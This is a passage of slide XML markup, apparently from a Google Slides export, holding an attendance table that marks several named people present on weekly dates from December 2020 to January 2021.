                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="365825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t> Wafi</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Tun Siang </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>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Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Justin</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>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Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Irfan</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>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Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present </a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Present</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="Google Shape;260;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="5791200"/>
            <a:ext cx="3246438" cy="6461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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>** Insert new columns if needed</a:t>
            </a:r>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="261" name="Google Shape;261;p8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="86125" y="3601725"/>
          <a:ext cx="8940000" cy="1849425"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:noFill/>
                <a:tableStyleId>{5830FC0F-5C3E-4966-B63A-2CCE79721B59}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1117500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1117500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1117500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1117500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1117500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1117500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1117500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20006"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1117500">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20007"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>Name</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>9/12/2020</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>16/12/2020</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>23/12/2020</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>6/1/2021</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>13/1/2021</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>20/1/2021</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>27/1/2021</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
